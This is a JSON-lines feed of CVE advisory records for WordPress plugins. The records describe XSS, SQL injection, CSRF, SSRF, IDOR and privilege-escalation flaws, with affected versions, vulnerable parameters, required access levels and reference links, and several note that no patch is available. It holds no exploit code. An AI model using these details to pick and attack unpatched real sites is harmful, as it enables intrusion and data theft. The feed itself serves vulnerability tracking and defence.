{"CVE_ID":"CVE-2025-8295","slug":"employee-directory","versionImpact":"4.5.1","description":"The Employee Directory plugin for WordPress is vulnerable to Stored Cross-Site Scripting via the \u2018noaccess_msg\u2019 parameter in all versions up to, and including, 4.5.1 due to insufficient input sanitization and output escaping. This makes it possible for authenticated attackers, with Contributor-level access and above, to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page.","refs":"[{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/employee-directory\\\/tags\\\/4.5.1\\\/includes\\\/emd-form-builder-lite\\\/emd-form-frontend.php\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/employee-directory\\\/tags\\\/4.5.1\\\/includes\\\/emd-form-builder-lite\\\/emd-form-frontend.php\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3336753\\\/\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3336753\\\/\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/wordpress.org\\\/plugins\\\/employee-directory\\\/#developers\",\"name\":\"https:\\\/\\\/wordpress.org\\\/plugins\\\/employee-directory\\\/#developers\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/6d06d721-ab48-43ae-81d6-bd0b3177a7bf?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/6d06d721-ab48-43ae-81d6-bd0b3177a7bf?source=cve\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2023-1918","slug":"wp-fastest-cache","versionImpact":"1.1.2","description":"The WP Fastest Cache plugin for WordPress is vulnerable to Cross-Site Request Forgery in versions up to, and including, 1.1.2. This is due to missing or incorrect nonce validation on the wpfc_preload_single_callback function. This makes it possible for unauthenticated attackers to invoke a cache building action via a forged request granted they can trick a site administrator into performing an action such as clicking on a link.","refs":"[{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/1c8034ff-cf36-498f-9efc-a4e6bbb92b2c?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/1c8034ff-cf36-498f-9efc-a4e6bbb92b2c?source=cve\",\"refsource\":\"MISC\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/2893158\\\/wp-fastest-cache\\\/trunk\\\/wpFastestCache.php?contextall=1\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/2893158\\\/wp-fastest-cache\\\/trunk\\\/wpFastestCache.php?contextall=1\",\"refsource\":\"MISC\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2023-5231","slug":"magic-action-box","versionImpact":"2.17.2","description":"The Magic Action Box plugin for WordPress is vulnerable to Stored Cross-Site Scripting via shortcodes in versions up to, and including, 2.17.2 due to insufficient input sanitization and output escaping on user supplied attributes. This makes it possible for authenticated attackers with contributor-level and above permissions to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page.","recommendation":"No known patch available. Please review the vulnerability's details in depth and employ mitigations based on your organization's risk tolerance. It may be best to uninstall the affected software and find a replacement.","refs":"[{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/magic-action-box\\\/tags\\\/2.17.2\\\/lib\\\/functions.php#L287\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/magic-action-box\\\/tags\\\/2.17.2\\\/lib\\\/functions.php#L287\",\"refsource\":\"MISC\",\"tags\":[]},{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/ce9b908b-1388-41fb-915c-e4e29eaf57ed?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/ce9b908b-1388-41fb-915c-e4e29eaf57ed?source=cve\",\"refsource\":\"MISC\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-0678","slug":"order-delivery-date","versionImpact":"1.2","description":"The Order Delivery Date for WP e-Commerce plugin for WordPress is vulnerable to Stored Cross-Site Scripting via the 'available-days-tf' parameter in all versions up to, and including, 1.2 due to insufficient input sanitization and output escaping. This makes it possible for unauthenticated attackers to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page.","recommendation":"No known patch available. Please review the vulnerability's details in depth and employ mitigations based on your organization's risk tolerance. It may be best to uninstall the affected software and find a replacement.","refs":"[{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/71fb90b6-a484-4a70-a9dc-795cbf2e275e?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/71fb90b6-a484-4a70-a9dc-795cbf2e275e?source=cve\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/order-delivery-date\\\/trunk\\\/order_delivery_date.php#L221\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/order-delivery-date\\\/trunk\\\/order_delivery_date.php#L221\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-1981","slug":"wpvivid-backuprestore","description":"The Migration, Backup, Staging \u2013 WPvivid plugin for WordPress is vulnerable to SQL Injection via the 'table_prefix' parameter in version 0.9.68 due to insufficient escaping on the user supplied parameter and lack of sufficient preparation on the existing SQL query.  This makes it possible for unauthenticated attackers to append additional SQL queries into already existing queries that can be used to extract sensitive information from the database.","refs":"[{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/ef8bfb38-4f20-4f9f-bb30-a88f3be2d2d3?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/ef8bfb38-4f20-4f9f-bb30-a88f3be2d2d3?source=cve\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/research.hisolutions.com\\\/2024\\\/01\\\/multiple-vulnerabilities-in-wordpress-plugin-wpvivid-backup-and-migration\\\/\",\"name\":\"https:\\\/\\\/research.hisolutions.com\\\/2024\\\/01\\\/multiple-vulnerabilities-in-wordpress-plugin-wpvivid-backup-and-migration\\\/\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset?old_path=%2Fwpvivid-backuprestore%2Ftrunk&old=2667839&new_path=%2Fwpvivid-backuprestore%2Ftrunk&new=2667839\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset?old_path=%2Fwpvivid-backuprestore%2Ftrunk&old=2667839&new_path=%2Fwpvivid-backuprestore%2Ftrunk&new=2667839\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-1181","slug":"coming-soon-wp","versionImpact":"2.1.2","description":"The Coming Soon, Under Construction & Maintenance Mode By Dazzler plugin for WordPress is vulnerable to maintenance mode bypass in all versions up to, and including, 2.1.2. This is due to the plugin relying on the REQUEST_URI to determine if the page being accessed is an admin area. This makes it possible for unauthenticated attackers to bypass maintenance mode and access the site which may be considered confidential when in maintenance mode.","recommendation":"No known patch available. Please review the vulnerability's details in depth and employ mitigations based on your organization's risk tolerance. It may be best to uninstall the affected software and find a replacement.","refs":"[{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/6dc144cd-7119-477f-9fa1-b00cab215077?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/6dc144cd-7119-477f-9fa1-b00cab215077?source=cve\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/coming-soon-wp\\\/trunk\\\/coming-soon-wp.php#L45\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/coming-soon-wp\\\/trunk\\\/coming-soon-wp.php#L45\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-4043","slug":"wp-ultimate-post-grid","versionImpact":"3.9.1","description":"The WP Ultimate Post Grid plugin for WordPress is vulnerable to Stored Cross-Site Scripting via the plugin's 'wpupg-text' shortcode in all versions up to, and including, 3.9.1 due to insufficient input sanitization and output escaping on user supplied attributes. This makes it possible for authenticated attackers, with contributor-level access and above, to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page.","refs":"[{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/14e897f0-11e6-43b1-908c-be4ecdc7fd58?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/14e897f0-11e6-43b1-908c-be4ecdc7fd58?source=cve\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/wp-ultimate-post-grid\\\/trunk\\\/includes\\\/public\\\/shortcodes\\\/general\\\/class-wpupg-sc-text.php#L97\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/wp-ultimate-post-grid\\\/trunk\\\/includes\\\/public\\\/shortcodes\\\/general\\\/class-wpupg-sc-text.php#L97\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3086319\\\/\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3086319\\\/\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/wordpress.org\\\/plugins\\\/wp-ultimate-post-grid\\\/#developers\",\"name\":\"https:\\\/\\\/wordpress.org\\\/plugins\\\/wp-ultimate-post-grid\\\/#developers\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-6848","slug":"post-and-page-builder","versionImpact":"1.26.6","description":"The Post and Page Builder by BoldGrid \u2013 Visual Drag and Drop Editor plugin for WordPress is vulnerable to Stored Cross-Site Scripting via file uploads in all versions up to, and including, 1.26.6 due to insufficient input sanitization and output escaping affecting the boldgrid_canvas_image AJAX endpoint. This makes it possible for authenticated attackers, with Contributor-level access and above, to inject arbitrary web scripts in pages that will execute whenever a user accesses the SVG file.","refs":"[{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/4d5dcec8-fa36-43ab-9a35-0b391fe1d88e?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/4d5dcec8-fa36-43ab-9a35-0b391fe1d88e?source=cve\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/post-and-page-builder\\\/tags\\\/1.26.6\\\/includes\\\/class-boldgrid-editor-ajax.php#L372\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/post-and-page-builder\\\/tags\\\/1.26.6\\\/includes\\\/class-boldgrid-editor-ajax.php#L372\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/wordpress.org\\\/plugins\\\/post-and-page-builder\\\/#developers\",\"name\":\"https:\\\/\\\/wordpress.org\\\/plugins\\\/post-and-page-builder\\\/#developers\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/github.com\\\/BoldGrid\\\/post-and-page-builder\\\/pull\\\/613\\\/commits\\\/64c33a6d0c9dbb0151d3af5fee9e026df6c5a2f6\",\"name\":\"https:\\\/\\\/github.com\\\/BoldGrid\\\/post-and-page-builder\\\/pull\\\/613\\\/commits\\\/64c33a6d0c9dbb0151d3af5fee9e026df6c5a2f6\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/github.com\\\/BoldGrid\\\/post-and-page-builder\\\/issues\\\/612\",\"name\":\"https:\\\/\\\/github.com\\\/BoldGrid\\\/post-and-page-builder\\\/issues\\\/612\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-8729","slug":"easy-social-share-buttons","versionImpact":"1.4.5","description":"The Easy Social Share Buttons plugin for WordPress is vulnerable to Reflected Cross-Site Scripting due to the use of add_query_arg without appropriate escaping on the URL in all versions up to, and including, 1.4.5. This makes it possible for unauthenticated attackers to inject arbitrary web scripts in pages that execute if they can successfully trick a user into performing an action such as clicking on a link.","recommendation":"No known patch available. Please review the vulnerability's details in depth and employ mitigations based on your organization's risk tolerance. It may be best to uninstall the affected software and find a replacement.","refs":"[{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/b616bb6c-0861-4920-a589-f2c5bb819164?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/b616bb6c-0861-4920-a589-f2c5bb819164?source=cve\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/easy-social-share-buttons\\\/trunk\\\/includes\\\/class-easy-social-share-buttons-settings.php#L271\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/easy-social-share-buttons\\\/trunk\\\/includes\\\/class-easy-social-share-buttons-settings.php#L271\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-9637","slug":"wpschoolpress","versionImpact":"2.2.10","description":"The School Management System \u2013 WPSchoolPress plugin for WordPress is vulnerable to privilege escalation via account takeover in all versions up to, and including, 2.2.10. This is due to the plugin not properly validating a user's identity prior to updating their details like email. This makes it possible for authenticated attackers, with teacher-level access and above, to change arbitrary user's email addresses, including administrators, and leverage that to reset the user's password and gain access to their account.","recommendation":"No known patch available. Please review the vulnerability's details in depth and employ mitigations based on your organization's risk tolerance. It may be best to uninstall the affected software and find a replacement.","refs":"[{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/411693fc-9df3-44b1-9a6f-58a6e8ef23b8?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/411693fc-9df3-44b1-9a6f-58a6e8ef23b8?source=cve\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/wpschoolpress\\\/tags\\\/2.2.9\\\/lib\\\/wpsp-ajaxworks-teacher.php#L598\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/wpschoolpress\\\/tags\\\/2.2.9\\\/lib\\\/wpsp-ajaxworks-teacher.php#L598\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-49303","slug":"hmenu","versionImpact":"1.16.5","description":"Improper Neutralization of Special Elements used in an SQL Command ('SQL Injection') vulnerability in NotFound Hero Mega Menu - Responsive WordPress Menu Plugin allows SQL Injection. This issue affects Hero Mega Menu - Responsive WordPress Menu Plugin: from n\/a through 1.16.5.","recommendation":"No known patch available. Please review the vulnerability's details in depth and employ mitigations based on your organization's risk tolerance. It may be best to uninstall the affected software and find a replacement.","refs":"[{\"url\":\"https:\\\/\\\/patchstack.com\\\/database\\\/wordpress\\\/plugin\\\/hmenu\\\/vulnerability\\\/wordpress-hero-menu-plugin-1-16-5-sql-injection-vulnerability?_s_id=cve\",\"name\":\"https:\\\/\\\/patchstack.com\\\/database\\\/wordpress\\\/plugin\\\/hmenu\\\/vulnerability\\\/wordpress-hero-menu-plugin-1-16-5-sql-injection-vulnerability?_s_id=cve\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2025-1406","slug":"newpost-catch","versionImpact":"1.3.19","description":"The Newpost Catch plugin for WordPress is vulnerable to Stored Cross-Site Scripting via the plugin's npc shortcode in all versions up to, and including, 1.3.19 due to insufficient input sanitization and output escaping on user supplied attributes. This makes it possible for authenticated attackers, with contributor-level access and above, to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page.","refs":"[{\"url\":\"https:\\\/\\\/wordpress.org\\\/plugins\\\/newpost-catch\\\/#developers\",\"name\":\"https:\\\/\\\/wordpress.org\\\/plugins\\\/newpost-catch\\\/#developers\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/dbbea6bf-b795-4837-9dc9-7cb8769ab89f?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/dbbea6bf-b795-4837-9dc9-7cb8769ab89f?source=cve\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2025-1703","slug":"ultimate-blocks","versionImpact":"3.2.7","description":"The Ultimate Blocks plugin for WordPress is vulnerable to Stored Cross-Site Scripting via the \u2018content\u2019 parameter in all versions up to, and including, 3.2.7 due to insufficient input sanitization and output escaping. This makes it possible for authenticated attackers, with Contributor-level access and above, to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page.","refs":"[{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/ultimate-blocks\\\/trunk\\\/src\\\/extensions\\\/responsive-control\\\/class-responsive-control.php#L46\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/ultimate-blocks\\\/trunk\\\/src\\\/extensions\\\/responsive-control\\\/class-responsive-control.php#L46\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3260377\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3260377\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3260377\\\/ultimate-blocks\\\/trunk\\\/src\\\/extensions\\\/responsive-control\\\/class-responsive-control.php\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3260377\\\/ultimate-blocks\\\/trunk\\\/src\\\/extensions\\\/responsive-control\\\/class-responsive-control.php\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/wordpress.org\\\/plugins\\\/ultimate-blocks\\\/#developers\",\"name\":\"https:\\\/\\\/wordpress.org\\\/plugins\\\/ultimate-blocks\\\/#developers\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/a2520d98-3cee-4431-bf9c-b2fd01a584ce?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/a2520d98-3cee-4431-bf9c-b2fd01a584ce?source=cve\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2025-1284","slug":"xc-woo-google-cloud-print","versionImpact":"4.1","description":"The Woocommerce Automatic Order Printing | ( Formerly WooCommerce Google Cloud Print) plugin for WordPress is vulnerable to Insecure Direct Object Reference in all versions up to, and including, 4.1 via the xc_woo_printer_preview AJAX action due to missing validation on a user controlled key. This makes it possible for authenticated attackers, with Subscriber-level access and above, to view other users' invoices and orders which can contain sensitive information.","recommendation":"No known patch available. Please review the vulnerability's details in depth and employ mitigations based on your organization's risk tolerance. It may be best to uninstall the affected software and find a replacement.","refs":"[{\"url\":\"https:\\\/\\\/codecanyon.net\\\/item\\\/woocommerce-google-cloud-print\\\/21129093\",\"name\":\"https:\\\/\\\/codecanyon.net\\\/item\\\/woocommerce-google-cloud-print\\\/21129093\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/6f593dce-4b56-46c0-becd-75fd16f165a8?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/6f593dce-4b56-46c0-becd-75fd16f165a8?source=cve\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2025-8294","slug":"download-counter","versionImpact":"1.3","description":"The Download Counter plugin for WordPress is vulnerable to Stored Cross-Site Scripting via the \u2018name\u2019 parameter in all versions up to, and including, 1.3 due to insufficient input sanitization and output escaping. This makes it possible for authenticated attackers, with Contributor-level access and above, to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page.","refs":"[{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3338968\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3338968\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/wordpress.org\\\/plugins\\\/download-counter\\\/#developers\",\"name\":\"https:\\\/\\\/wordpress.org\\\/plugins\\\/download-counter\\\/#developers\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/9fcf7936-8a28-45b9-a9dc-fd7257a83a84?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/9fcf7936-8a28-45b9-a9dc-fd7257a83a84?source=cve\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2023-25049","slug":"ecommerce-product-catalog","versionImpact":"3.3.4","description":"Auth. (admin+) Stored Cross-Site Scripting (XSS) vulnerability in impleCode eCommerce Product Catalog Plugin for WordPress plugin <= 3.3.4 versions.","refs":"[{\"url\":\"https:\\\/\\\/patchstack.com\\\/database\\\/vulnerability\\\/ecommerce-product-catalog\\\/wordpress-ecommerce-product-catalog-plugin-for-wordpress-plugin-3-3-4-cross-site-scripting-xss-vulnerability?_s_id=cve\",\"name\":\"https:\\\/\\\/patchstack.com\\\/database\\\/vulnerability\\\/ecommerce-product-catalog\\\/wordpress-ecommerce-product-catalog-plugin-for-wordpress-plugin-3-3-4-cross-site-scripting-xss-vulnerability?_s_id=cve\",\"refsource\":\"MISC\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2023-4308","slug":"user-submitted-posts","versionImpact":"20230809","description":"The User Submitted Posts plugin for WordPress is vulnerable to Stored Cross-Site Scripting via the \u2018user-submitted-content\u2019 parameter in versions up to, and including, 20230809 due to insufficient input sanitization and output escaping. This makes it possible for unauthenticated attackers to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page.","refs":"[{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/2952471\\\/user-submitted-posts\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/2952471\\\/user-submitted-posts\",\"refsource\":\"MISC\",\"tags\":[]},{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/3bb4d37c-c4c2-4523-9b4e-73ffb7be81ea?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/3bb4d37c-c4c2-4523-9b4e-73ffb7be81ea?source=cve\",\"refsource\":\"MISC\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-1978","slug":"friends","versionImpact":"2.8.5","description":"The Friends plugin for WordPress is vulnerable to Server-Side Request Forgery in all versions up to, and including, 2.8.5 via the discover_available_feeds function. This makes it possible for authenticated attackers, with administrator-level access and above, to make web requests to arbitrary locations originating from the web application and can be used to query and modify information from internal services.","refs":"[{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/72e1fbce-86ae-4518-a613-7c322193acf4?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/72e1fbce-86ae-4518-a613-7c322193acf4?source=cve\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/github.com\\\/akirk\\\/friends\\\/pull\\\/290\",\"name\":\"https:\\\/\\\/github.com\\\/akirk\\\/friends\\\/pull\\\/290\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset?sfp_email=&sfph_mail=&reponame=&old=3036987%40friends&new=3036987%40friends&sfp_email=&sfph_mail=\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset?sfp_email=&sfph_mail=&reponame=&old=3036987%40friends&new=3036987%40friends&sfp_email=&sfph_mail=\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-4564","slug":"woolementor","versionImpact":"4.4.1","description":"The CoDesigner WooCommerce Builder for Elementor \u2013 Customize Checkout, Shop, Email, Products & More plugin for WordPress is vulnerable to Stored Cross-Site Scripting via the plugin's Shop Slider, Tabs Classic, and Image Comparison widgets in all versions up to, and including, 4.4.1 due to insufficient input sanitization and output escaping on user supplied attributes. This makes it possible for authenticated attackers, with contributor-level access and above, to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page.","refs":"[{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/3115e8ad-8e68-41e9-a3a0-5f003d921037?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/3115e8ad-8e68-41e9-a3a0-5f003d921037?source=cve\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/woolementor\\\/trunk\\\/widgets\\\/shop-slider\\\/template.php#L29\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/woolementor\\\/trunk\\\/widgets\\\/shop-slider\\\/template.php#L29\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/woolementor\\\/trunk\\\/widgets\\\/tabs-classic\\\/tabs-classic.php#L329\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/woolementor\\\/trunk\\\/widgets\\\/tabs-classic\\\/tabs-classic.php#L329\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/woolementor\\\/trunk\\\/widgets\\\/image-comparison\\\/image-comparison.php#L418\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/woolementor\\\/trunk\\\/widgets\\\/image-comparison\\\/image-comparison.php#L418\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3099922\\\/\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3099922\\\/\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/wordpress.org\\\/plugins\\\/woolementor\\\/#developers\",\"name\":\"https:\\\/\\\/wordpress.org\\\/plugins\\\/woolementor\\\/#developers\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-6497","slug":"squirrly-seo","versionImpact":"12.3.19","description":"The SEO Plugin by Squirrly SEO plugin for WordPress is vulnerable to Stored Cross-Site Scripting via the \u2018url\u2019 parameter in all versions up to, and including, 12.3.19 due to insufficient input sanitization and output escaping. This makes it possible for authenticated attackers, with Contributor-level access and above, to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page.","refs":"[{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/bb3aa613-8f34-4d96-8ddf-41fcdcf65c59?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/bb3aa613-8f34-4d96-8ddf-41fcdcf65c59?source=cve\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/squirrly-seo\\\/trunk\\\/controllers\\\/Api.php#L267\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/squirrly-seo\\\/trunk\\\/controllers\\\/Api.php#L267\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/wordpress.org\\\/plugins\\\/squirrly-seo\\\/#developers\",\"name\":\"https:\\\/\\\/wordpress.org\\\/plugins\\\/squirrly-seo\\\/#developers\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3121853\\\/\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3121853\\\/\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-43256","slug":"leopard-wordpress-offload-media","versionImpact":"2.0.36","description":"Missing Authorization vulnerability in nouthemes Leopard - WordPress offload media allows Accessing Functionality Not Properly Constrained by ACLs.This issue affects Leopard - WordPress offload media: from n\/a through 2.0.36.","recommendation":"No known patch available. Please review the vulnerability's details in depth and employ mitigations based on your organization's risk tolerance. It may be best to uninstall the affected software and find a 